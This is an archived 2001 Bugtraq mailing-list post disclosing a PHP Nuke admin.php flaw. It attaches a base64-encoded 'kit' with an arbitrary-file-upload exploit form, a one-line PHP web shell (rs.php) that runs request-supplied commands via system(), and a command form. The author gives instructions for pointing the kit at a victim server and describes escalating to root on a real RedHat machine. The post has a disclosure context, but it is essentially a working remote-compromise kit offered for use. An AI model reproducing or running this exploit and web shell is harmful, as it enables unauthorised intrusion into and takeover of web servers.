[22777] in bugtraq
Full-xploiting PHP Nuke
daemon@ATHENA.MIT.EDU (RoMaN SoFt / LLFB)
Wed Oct 3 13:04:29 2001
From: RoMaN SoFt / LLFB <roman@madrid.com>
To: bugtraq@securityfocus.com
Date: Wed, 03 Oct 2001 16:40:31 +0200
Message-ID: <qo8mrtkji87691dvasd7f5dv5mfjlv64b0@4ax.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="--=_vq8mrtchufd9h8crre5g2qutqenkfm9j00.MFSBCHJLHS"
----=_vq8mrtchufd9h8crre5g2qutqenkfm9j00.MFSBCHJLHS
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable
Hi.
This post is related to Francisco Burzi's PHP Nuke (bugtraq id 3361):
http://www.twlc.net/article.php?sid=3D421
http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=3Dinfo&id=3D33=
61
The discussed bug is *very* serious. I will try to demonstrate it ;-)
In the former advisory by twlc it is described how to use admin.php
script's bug for copying _existing_ files *inside* the remote machine
but NOT how to upload files. The first exploit is described in the
advisory. The second one is described here and it's attached as
"phpnuker.html" :-). It permits to upload arbitrary files to the
victim server, usually as the "apache" user (depending on webserver's
configuration). Have a look at the code to adjust some parameters:
servername/ip and remote directory.
I've also created two other "scripts" (well, the last one is really a
html form): rs.php and cmd.html. Using both files you can execute
commands in the victim server (usually as "apache" user). You have to
upload "rs.php" to the victim webserver and then use "cmd.html" form
to send the commands to server.
All the scripts are intuitive so have a look at the code and change
parameters like "victim server name" and "remote directory" (this is
the directory where files will be uploaded to). Don't forget to change
these values.
As you can execute commands on the server you can try to exploit some
local bug and gain r00t priviledges. This is tedious 'cause you
haven't got an interactive shell but it's terribly possible. I got to
r00t a RedHat 7.1 Linux box with Apache 1.3.20 (running as "apache"
user) and with all ports closed except 80 (of course) using this
technique.
Kind regards ;-)
RoMaNSoFt @ irc.irc-hispano.org
roman@deathsdoor.com
----=_vq8mrtchufd9h8crre5g2qutqenkfm9j00.MFSBCHJLHS
Content-Type: application/octet-stream; name=phpnuker.zip
Content-Transfer-Encoding: base64
Content-Description: PHP Nuke-r "kit" :-)
Content-Disposition: attachment; filename=phpnuker.zip
UEsDBBQAAAAIAGR8Qytb+U+9AgEAALQBAAANAAAAcGhwbnVrZXIuaHRtbF1RMW7DMAzcC/QPrKZ2
iIWsge0x6NIgSNEHyBZTE5EsQabi+veVZddAswjk8e5wpMqOramfn8oOla5LJjZYn9/Pu1O8YYBm
gov7UKdPd+RSLtNSZm7SNE5PWbvfJPDjjSN+ECbCTAvze3XBAvYtTx4rYaNh8iqwnPGdVqwEqJbJ
9ZXomP1BynEcizslzBats1JpS33hOy/AIndOV8K7gcVsTr2PDIt1R1pjL6BXNnUx5VJawF2ZmNr9
TL+gdYzwuszeQFPAll2YDrA6LdoxDTalJKu+cZCiLn3yOJLBB3ocMFwTLNYguV7Y/wIOsbHEm/FX
TgHEL3mVfJBc/J1Zrn/1C1BLAwQKAAAAAABIXEIrtAa+CiEAAAAhAAAADwAAAHBocG51a2VyL3Jz
LnBocDw/cGhwDQogIHN5c3RlbSgiJGEgMj4mMSIpOw0KPz4NClBLAwQUAAAACABJfEMrriHyxHQA
AACKAAAAEQAAAHBocG51a2VyL2NtZC5odG1sLc7BDcIwDAXQOxI7BA8Q36uGCxuwgWkDsYQTq3Ea
sT0p4ub/9PXl+Vk2cRItlTWAlmrgaDEuOUAy0wmx9+53HiZ+KYIs9IoVt+o1KVzPp5usk5s5azOX
SWIAOvgv9tEhtT2Ex/RO7zbivWXHdvnV8PhgHF9QSwECFAAUAAAACABkfEMrW/lPvQIBAAC0AQAA
DQAAAAAAAAABACAAtoEAAAAAcGhwbnVrZXIuaHRtbFBLAQIUAAoAAAAAAEhcQiu0Br4KIQAAACEA
AAAPAAAAAAAAAAEAIAC2gS0BAABwaHBudWtlci9ycy5waHBQSwECFAAUAAAACABJfEMrriHyxHQA
AACKAAAAEQAAAAAAAAABACAAtoF7AQAAcGhwbnVrZXIvY21kLmh0bWxQSwUGAAAAAAMAAwC3AAAA
HgIAAAAA
----=_vq8mrtchufd9h8crre5g2qutqenkfm9j00.MFSBCHJLHS--
